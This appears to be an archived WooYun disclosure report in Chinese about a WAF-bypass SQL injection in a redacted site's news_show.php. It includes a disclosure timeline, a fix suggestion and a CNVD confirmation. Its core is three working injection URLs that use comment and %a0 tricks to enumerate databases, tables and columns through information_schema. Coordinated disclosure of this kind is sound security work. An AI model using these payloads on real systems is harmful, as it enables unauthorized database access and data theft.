乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-16: 细节已通知厂商并且等待厂商处理中 2015-10-20: 厂商已经确认,细节仅向厂商公开 2015-10-30: 细节向核心白帽子及相关领域专家公开 2015-11-09: 细节向普通白帽子公开 2015-11-19: 细节向实习白帽子公开 2015-12-04: 细节向公众公开
waf绕过
特殊字符绕过:/**/和%a0
http://**.**.**.**/news_show.php?id=1904/**/and%201=2/**/union/**/select%201,database/**/(),3,4,5,6,7,8,9,10,11
http://**.**.**.**/news_show.php?id=1901/**/and%201=2/**/union/**/select%201,table_name,3,4,5,6,7,8,9,10,11%20%a0from%20information_schema.tables%20where%20table_schema=0x7A7A7A73--
http://**.**.**.**/news_show.php?id=1901/**/and%201=2/**/union/**/select%201,%a0concat(0x3C666F6E7420636F6C6F723D7265642073697A653D353E73716C20696E6A656374696F6E206279204D722E52656E3C2F666F6E743E,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d353e44622056657273696f6e203a20,0x3c62723e44622055736572203a20,user/**/(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(/**/select%20(@x)%20%a0from%20(/**/select%20(@x:=0x00),(/**/select%20(0)%20%a0from%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20/**/and%20(0x00)%20in%20(@x:=concat(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x)),3,4,5,6,7,8,9,10,11
升级waf加强过滤规则,不要太相信waf,自己在加个过滤啊.
危害等级:中
漏洞Rank:9
确认时间:2015-10-20 16:52
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无